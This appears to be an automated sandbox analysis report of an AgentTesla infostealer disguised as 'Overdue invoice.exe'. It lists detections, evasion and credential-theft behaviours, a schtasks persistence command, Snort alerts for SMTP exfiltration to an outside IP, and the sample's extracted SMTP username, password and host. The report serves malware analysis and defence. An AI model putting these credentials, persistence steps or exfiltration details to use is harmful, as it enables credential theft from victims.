
Windows Analysis Report
Overdue invoice.exe

Overview

General Information

Sample Name:Overdue invoice.exe
Analysis ID:635084
MD5:21c2f8cc3f1d71ffb036ca3788a346b6
SHA1:b1f681eb0c5b406bad2414829d003568ab44982c
SHA256:8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
Tags:agentteslaexe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Overdue invoice.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\Overdue invoice.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 7056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yqWDN.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 5080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • yqWDN.exe (PID: 5572 cmdline: {path} MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • yqWDN.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}
Yara matches in memory dumps (5 of 37 entries shown):
Source | Rule | Description | Author | Strings
00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in unpacked PE files (5 of 60 entries shown):
Source | Rule | Description | Author | Strings
16.2.yqWDN.exe.3de2e78.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
16.2.yqWDN.exe.3de2e78.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
16.2.yqWDN.exe.3de2e78.2.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x30e30:$s10: logins
  • 0x30897:$s11: credential
  • 0x2ce34:$g1: get_Clipboard
  • 0x2ce42:$g2: get_Keyboard
  • 0x2ce4f:$g3: get_Password
  • 0x2e15c:$g4: get_CtrlKeyDown
  • 0x2e16c:$g5: get_ShiftKeyDown
  • 0x2e17d:$g6: get_AltKeyDown
19.0.yqWDN.exe.400000.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
19.0.yqWDN.exe.400000.8.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
                    No Sigma rule has matched
Snort IDS alerts:

Timestamp: 05/27/22-12:53:52.919110
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2840032
Source Port: 49715
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:53:52.919010
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2030171
Source Port: 49715
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668198
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2030171
Source Port: 49745
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:53:52.919010
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2839723
Source Port: 49715
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668311
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2840032
Source Port: 49745
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668198
Source IP: 192.168.2.3
Destination IP: 206.183.111.188
SID: 2839723
Source Port: 49745
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

                    AV Detection

Source: 19.0.yqWDN.exe.400000.6.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}
Source: Overdue invoice.exe | Virustotal: Detection: 60%
Source: Overdue invoice.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | ReversingLabs: Detection: 60%
Source: Overdue invoice.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | Joe Sandbox ML: detected
Source: 19.0.yqWDN.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.2.yqWDN.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.2.Overdue invoice.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: Overdue invoice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Overdue invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49745 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49745 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49745 -> 206.183.111.188:587
Source: Joe Sandbox View | ASN Name: WEBWERKS-AS-INWebWerksIndiaPvtLtdIN
Source: Joe Sandbox View | IP Address: 206.183.111.188
Source: global traffic | TCP traffic: 192.168.2.3:49715 -> 206.183.111.188:587
Source: global traffic | TCP traffic: 192.168.2.3:49715 -> 206.183.111.188:587
Source: unknown | DNS traffic detected: queries for: mail.jkudyog.com
Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\Overdue invoice.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    System Summary

Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: initial sample | Static PE information: Filename: Overdue invoice.exe
Source: 7.0.Overdue invoice.exe.400000.10.unpack, <PrivateImplementationDetails>{343CACBF-3C8A-4F57-A6FE-44CB0DE3909A}/BD96E5B6-862E-4184-9A95-4B268ED60D89.cs | Large array initialization: .cctor: array initializer size 11614
Source: 7.0.Overdue invoice.exe.400000.6.unpack, <PrivateImplementationDetails>{343CACBF-3C8A-4F57-A6FE-44CB0DE3909A}/BD96E5B6-862E-4184-9A95-4B268ED60D89.cs | Large array initialization: .cctor: array initializer size 11614
Source: 7.0.Overdue invoice.exe.400000.12.unpack, <PrivateImplementationDetails>{343CACBF-3C8A-4F57-A6FE-44CB0DE3909A}/BD96E5B6-862E-4184-9A95-4B268ED60D89.cs | Large array initialization: .cctor: array initializer size 11614
Source: 7.2.Overdue invoice.exe.400000.0.unpack, <PrivateImplementationDetails>{343CACBF-3C8A-4F57-A6FE-44CB0DE3909A}/BD96E5B6-862E-4184-9A95-4B268ED60D89.cs | Large array initialization: .cctor: array initializer size 11614
Source: Overdue invoice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: Overdue invoice.exe, 00000000.00000000.250199094.00000000005C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.299437457.0000000002C16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.304201924.0000000007160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000005.00000002.290997467.0000000000396000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000000.295675285.0000000001086000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.521143332.00000000016E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000003.316115485.0000000006A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.520543885.00000000014F8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue invoice.exe
                    Source: Overdue invoice.exe Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: dYXeRswtYBrq.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: yqWDN.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Overdue invoice.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: dYXeRswtYBrq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: yqWDN.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Overdue invoice.exe Virustotal: Detection: 60%
                    Source: Overdue invoice.exe ReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\Overdue invoice.exe File read: C:\Users\user\Desktop\Overdue invoice.exe
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown Process created: C:\Users\user\Desktop\Overdue invoice.exe "C:\Users\user\Desktop\Overdue invoice.exe"
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\Overdue invoice.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe File created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe
                    Source: C:\Users\user\Desktop\Overdue invoice.exe File created: C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                    Source: C:\Users\user\Desktop\Overdue invoice.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: Overdue invoice.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Overdue invoice.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Overdue invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Overdue invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
